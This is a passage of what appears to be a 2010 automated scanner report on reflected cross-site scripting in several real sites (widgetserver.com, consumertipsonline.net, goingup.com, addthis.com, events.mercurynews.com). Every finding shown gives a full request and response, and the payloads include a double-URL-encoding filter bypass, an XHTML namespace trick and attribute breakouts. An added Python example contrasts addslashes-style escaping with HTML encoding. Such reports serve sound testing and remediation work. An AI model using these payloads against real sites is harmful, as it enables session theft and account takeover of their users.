Cookie: ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; FFgeo=8925100; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; ZHO162,570,21=1; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZCBC=1; ZEDOIDX=29; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 784
Content-Type: application/x-javascript
ETag: "898b0b78-4239-48e2858f30440"
X-Varnish: 1843423143 1843421748
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1729
Date: Mon, 15 Nov 2010 02:51:14 GMT
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

w0.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=lar/v10-003/c7;referrer='+document.referrer+';tag=c7.zedo.com/lar/v10-003/c7/jsc/flr.js;qs=1f763'-alert(1)-'1a7b6ec85c8=1;';

var zzStr="q=;z="+Math.random();var zzSection=0;var zzPat='';

var zzhasAd;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = new Date(); zzd.setDate(zz
...[SNIP]...

3.32. http://cdn.widgetserver.com/syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355/u/1/ [REST URL parameter 18]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355/u/1/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 758c9%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e23959522cb9 was submitted in the REST URL parameter 18. This input was echoed as 758c9<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>23959522cb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355758c9%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e23959522cb9/u/1/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://cdn.widgetserver.com/syndication/flash/InsertWidget.swf?&wbx_ref=http%3A%2F%2Fwww.siliconvalley.com%2F&wbx_useragent=Mozilla%2F4.0+%2
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: cdn.widgetserver.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Mon, 15 Nov 2010 01:54:42 GMT
Expires: Thu, 18 Nov 2010 01:53:42 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
X-Pad: avoid browser bug
Content-Length: 6441

<response><widgets><widget><token>585223039983919a6cabeea767ed2376729872f60000012c47a42355758c9<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>23959522cb9</token><app-id>52e35
...[SNIP]...

3.33. http://cdn.widgetserver.com/syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355/u/1/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355/u/1/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9baf<a>dc1d20d44e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0c9baf<a>dc1d20d44e3/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355/u/1/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://cdn.widgetserver.com/syndication/flash/InsertWidget.swf?&wbx_ref=http%3A%2F%2Fwww.siliconvalley.com%2F&wbx_useragent=Mozilla%2F4.0+%2
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: cdn.widgetserver.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/xml;charset=UTF-8
Date: Mon, 15 Nov 2010 01:13:12 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Length: 1697

<response><widgets><widget><token>585223039983919a6cabeea767ed2376729872f60000012c47a42355</token><app-id>52e35ba2-8abd-48a3-8801-4f418493fee0c9baf<a>dc1d20d44e3</app-id><reg-id></reg-id><friendly-id>
...[SNIP]...

3.34. http://cdn.widgetserver.com/syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec/u/1/ [REST URL parameter 18]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec/u/1/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 2df4e%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e212e11ba257 was submitted in the REST URL parameter 18. This input was echoed as 2df4e<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>212e11ba257 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec2df4e%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e212e11ba257/u/1/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://cdn.widgetserver.com/syndication/flash/InsertWidget.swf?&wbx_ref=http%3A%2F%2Fwww.mercurynews.com%2Fnews&wbx_useragent=Mozilla%2F4.0+
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: cdn.widgetserver.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Mon, 15 Nov 2010 01:54:30 GMT
Expires: Thu, 18 Nov 2010 01:53:30 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
X-Pad: avoid browser bug
Content-Length: 6365

<response><widgets><widget><token>eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec2df4e<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>212e11ba257</token><app-id>58c04
...[SNIP]...

3.35. http://cdn.widgetserver.com/syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec/u/1/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec/u/1/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 101e4<a>9b600e0037f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951101e4<a>9b600e0037f/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec/u/1/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://cdn.widgetserver.com/syndication/flash/InsertWidget.swf?&wbx_ref=http%3A%2F%2Fwww.mercurynews.com%2Fnews&wbx_useragent=Mozilla%2F4.0+
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: cdn.widgetserver.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/xml;charset=UTF-8
Date: Mon, 15 Nov 2010 01:10:44 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Length: 1697

<response><widgets><widget><token>eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec</token><app-id>58c04479-79ac-40a6-9463-ff079ae00951101e4<a>9b600e0037f</app-id><reg-id></reg-id><friendly-id>
...[SNIP]...

3.36. http://consumertipsonline.net/health/us4.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://consumertipsonline.net
Path:   /health/us4.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7593b"><img%20src%3da%20onerror%3dalert(1)>d68ba1043cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7593b\"><img src=a onerror=alert(1)>d68ba1043cd in the application's response: the only transformation applied is a backslash in front of the double quote, which is consistent with PHP's addslashes() or magic_quotes_gpc (the server reports PHP/5.2.9) and which protects SQL string literals, not HTML.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. A backslash has no meaning inside an HTML attribute value, so the \" still terminates the href attribute of the <a> tag, and the <img> that follows is parsed as a new element whose onerror handler runs when the bogus src fails to load.

Request

GET /health/us4.php?t=1239000/7593b"><img%20src%3da%20onerror%3dalert(1)>d68ba1043cd098\ HTTP/1.1
Host: consumertipsonline.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:52:36 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 45510


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>

<meta http-equiv="Conte
...[SNIP]...
<a href="leanspa.php?t=1239000/7593b\"><img src=a onerror=alert(1)>d68ba1043cd098\\" target="_blank">
...[SNIP]...

3.37. http://consumertipsonline.net/health/us4.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://consumertipsonline.net
Path:   /health/us4.php

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ea2e"><img%20src%3da%20onerror%3dalert(1)>88ccf899957 was submitted in the t parameter. This input was echoed as 3ea2e\"><img src=a onerror=alert(1)>88ccf899957 in the application's response; as in the previous finding, the quote is backslash-escaped rather than HTML-encoded.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The backslash does not stop the \" from closing the href attribute, so the injected <img> becomes a separate element and its onerror handler fires. Both findings share the same leanspa.php link template, so a single fix (HTML attribute encoding of t, or URL-encoding it before building the link) covers them.

Request

GET /health/us4.php?t=1239000098\3ea2e"><img%20src%3da%20onerror%3dalert(1)>88ccf899957 HTTP/1.1
Host: consumertipsonline.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:52:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 45484


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>

<meta http-equiv="Conte
...[SNIP]...
<a href="leanspa.php?t=1239000098\\3ea2e\"><img src=a onerror=alert(1)>88ccf899957" target="_blank">
...[SNIP]...
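Worked example for findings 3.36 and 3.37 (added here; not code from the report or from consumertipsonline.net): a hypothetical reconstruction of the leanspa.php link template with the backslash escaping seen in the responses, beside the same template with HTML attribute encoding, each fed through Python's html.parser as a stand-in for a browser tokenizer to show which tags come out. The render_link_* functions, the addslashes() port and the "Buy" link text are assumptions; the payload is the one the scanner submitted in 3.36.

```python
"""Why addslashes()-style escaping does not protect an HTML attribute.

Added example, not code from the report or from consumertipsonline.net.
The render_* functions are a hypothetical reconstruction of the
leanspa.php link template seen in findings 3.36 and 3.37.
"""
import html
from html.parser import HTMLParser


def addslashes(value):
    """Backslash-escape quotes and backslashes, as PHP addslashes()/magic_quotes_gpc do."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def render_link_vulnerable(t):
    """Hypothetical vulnerable template: backslash escaping, then raw interpolation into href."""
    return '<a href="leanspa.php?t=%s" target="_blank">Buy</a>' % addslashes(t)


def render_link_fixed(t):
    """Same template with HTML attribute encoding (quote=True escapes both quote kinds)."""
    return '<a href="leanspa.php?t=%s" target="_blank">Buy</a>' % html.escape(t, quote=True)


class TagCollector(HTMLParser):
    """Record start tags and their attributes as a tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    """List of (tag, attributes) start tags found in markup."""
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def attribute_breakout(markup):
    """True if anything other than the single intended <a> tag was tokenised."""
    return [t for t, _ in parse_tags(markup)] != ["a"]


# The scanner's payload from finding 3.36, URL-decoded.
PAYLOAD = '7593b"><img src=a onerror=alert(1)>d68ba1043cd'

if __name__ == "__main__":
    for name, render in (("vulnerable", render_link_vulnerable), ("fixed", render_link_fixed)):
        out = render(PAYLOAD)
        print(name, "->", out)
        print("  tags seen by parser:", [t for t, _ in parse_tags(out)])
        print("  breakout:", attribute_breakout(out))
```

The vulnerable rendering yields two tags, a and img, with onerror=alert(1) as a live attribute of the second; the encoded rendering yields one a tag whose href contains the payload as inert text. Note that html.escape() does not make the value URL-safe, so the correct fix for a URL parameter is urllib.parse.quote() followed by attribute encoding.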

3.38. http://counter.goingup.com/js/tracker.js [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://counter.goingup.com
Path:   /js/tracker.js

Issue detail

The value of the b request parameter is copied into a double-quoted JavaScript string literal (var guBadge="...") in a response served as application/javascript, not into HTML text as the scanner's classification suggests. The payload 2581e<script>alert(1)</script>b823be43aed was submitted in the b parameter. This input was echoed unmodified in the application's response.

The reflection is unfiltered, but the payload as submitted does not execute: inside a JavaScript string literal the <script> tags are ordinary characters, and a script resource is not parsed as HTML. To confirm exploitability, test whether a double quote and a backslash also pass through unmodified, since a " would close the string and let code follow it. Even then, the impact depends on a page that loads tracker.js with an attacker-chosen b, or on a browser that sniffs the response as HTML; neither is shown in this finding, so read the Certain confidence as a statement about the reflection, not about code execution.

Request

GET /js/tracker.js?st=xpjgr2n&b=52581e<script>alert(1)</script>b823be43aed HTTP/1.1
Accept: */*
Referer: http://www.ucsc-extension.edu/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: counter.goingup.com
Proxy-Connection: Keep-Alive
Pragma: no-cache

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 15 Nov 2010 02:52:38 GMT
Content-Type: application/javascript
Connection: close
X-Powered-By: PHP/5.3.3
Last-Modified: Fri, 01 May 2009 04:00:00 GMT
Expires: Sun, 31 May 2009 04:00:00GMT
Cache-Control: max-age=2592000, must-revalidate
Content-Length: 5654
ETag: "d1c04dd92c7a5f6defbc39f8f406d84d"
Set-Cookie: SERVERID=c12; path=/

if(typeof (guTracked)=="undefined"||!guTracked){if(typeof (guSiteId)=="undefined"){var guSiteId="xpjgr2n"}if(typeof (guBadge)=="undefined"){var guBadge="52581e<script>alert(1)</script>b823be43aed"}if(typeof (guWType)=="undefined"){var guWType=""}if(typeof (guCookieLiveTime)=="undefined"){var guCookieLiveTime='3600'}if(typeof (guCookieGlobalExpTime)=="undefined"){var guCookieGlobalExpTime="3153
...[SNIP]...

3.39. http://counter.goingup.com/js/tracker.js [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://counter.goingup.com
Path:   /js/tracker.js

Issue detail

The value of the st request parameter is copied into a double-quoted JavaScript string literal (var guSiteId="...") in a response served as application/javascript. The payload 96c02<script>alert(1)</script>228aa39f1fa was submitted in the st parameter. This input was echoed unmodified in the application's response.

The reflection is unfiltered, but the same caveats as for the b parameter apply: <script> tags inside a JavaScript string are inert, so the test that matters is whether a double quote or backslash is reflected without escaping, and practical impact needs a page that includes tracker.js with attacker-controlled parameters or a browser that treats the response as HTML.

Request

GET /js/tracker.js?st=xpjgr2n96c02<script>alert(1)</script>228aa39f1fa&b=5 HTTP/1.1
Accept: */*
Referer: http://www.ucsc-extension.edu/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: counter.goingup.com
Proxy-Connection: Keep-Alive
Pragma: no-cache

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 15 Nov 2010 02:52:38 GMT
Content-Type: application/javascript
Connection: close
X-Powered-By: PHP/5.3.3
Last-Modified: Fri, 01 May 2009 04:00:00 GMT
Expires: Sun, 31 May 2009 04:00:00GMT
Cache-Control: max-age=2592000, must-revalidate
Content-Length: 5650
ETag: "bf9c24cd125c4c6375e07a8262272f72"
Set-Cookie: SERVERID=c7; path=/

if(typeof (guTracked)=="undefined"||!guTracked){if(typeof (guSiteId)=="undefined"){var guSiteId="xpjgr2n96c02<script>alert(1)</script>228aa39f1fa"}if(typeof (guBadge)=="undefined"){var guBadge="5"}if(typeof (guWType)=="undefined"){var guWType=""}if(typeof (guCookieLiveTime)=="undefined"){var guCookieLiveTime=''}if(typeof (guCookieGlobalExpTime)
...[SNIP]...

3.40. http://ds.addthis.com/red/psi/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/p.json

Issue detail

The value of the callback request parameter is used, unvalidated, as the function name that wraps the JSONP response, which is served as text/javascript. The payload 9fe88<script>alert(1)</script>fa305a07b2a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

The reflection is unfiltered, but a <script> tag inside a JavaScript resource is not executed as markup; the weakness is that the endpoint prefixes whatever the caller supplies to its JSON body. That becomes cross-site scripting only if a browser renders the response as an HTML document, for instance through content sniffing, which is why the remediation is to restrict callback to a dotted identifier (the legitimate value here is _ate.ad.hpr) and to send X-Content-Type-Options: nosniff with the response.

Request

GET /red/psi/p.json?callback=_ate.ad.hpr9fe88<script>alert(1)</script>fa305a07b2a HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Sat, 12 Feb 2011 23:11:03 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 14 Nov 2010 23:11:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 23:11:03 GMT
Connection: close

_ate.ad.hpr9fe88<script>alert(1)</script>fa305a07b2a({"urls":[],"segments" : [],"loc": "NzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg=="})

3.41. http://events.mercurynews.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.mercurynews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: the content attribute of the og:url <meta> tag in the document head is built from the full request URL, query string included. The payload 8ac11"><script>alert(1)</script>811b9446da5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The "> closes the <meta> tag and the <script> that follows executes while the head is still being parsed. The same template is reflected on /movies, /performers, /restaurants and /venues in the findings below (the og:url host and the _zsess cookie show the site is hosted on the Zvents platform), so one fix to the og:url template, HTML-encoding the URL or emitting only the canonical path without the query string, covers all five.

Request

GET /?8ac11"><script>alert(1)</script>811b9446da5=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 14 Nov 2010 23:11:23 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.122.23.218
X-Runtime: 42
ETag: "2aff5497e3b5794850e510b692b9bed9"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=6X8sDNEAER_0Ouv71eRO3g.93565265; path=/; expires=Mon, 14-Nov-2011 23:11:23 GMT
Set-Cookie: zvents_tracker_sid=6X8sDNEAER_0Ouv71eRO3g.93565265; path=/; expires=Mon, 14-Nov-2011 23:11:23 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlYWMzOWQzMDcxMGYzOGRmMDYyNDZkY2U5NWI4N2ExYzYiDWxvY2F0aW9uexAiCWNpdHkiDVNhbiBKb3NlIgtyYWRpdXNpHiINbGF0aXR1ZGVmGjM3LjMxNjQ5OTk5OTk5OTk5OACXjSIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--73f95738d783d27b1e2bf4d6149a7fa91a710ab1; path=/; expires=Mon, 14-Feb-2011 23:11:23 GMT; HttpOnly
Content-Length: 73983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?8ac11"><script>alert(1)</script>811b9446da5=1" />
...[SNIP]...

3.42. http://events.mercurynews.com/movies [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.mercurynews.com
Path:   /movies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bca30"><script>alert(1)</script>9fc7022dbe7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies?bca30"><script>alert(1)</script>9fc7022dbe7=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
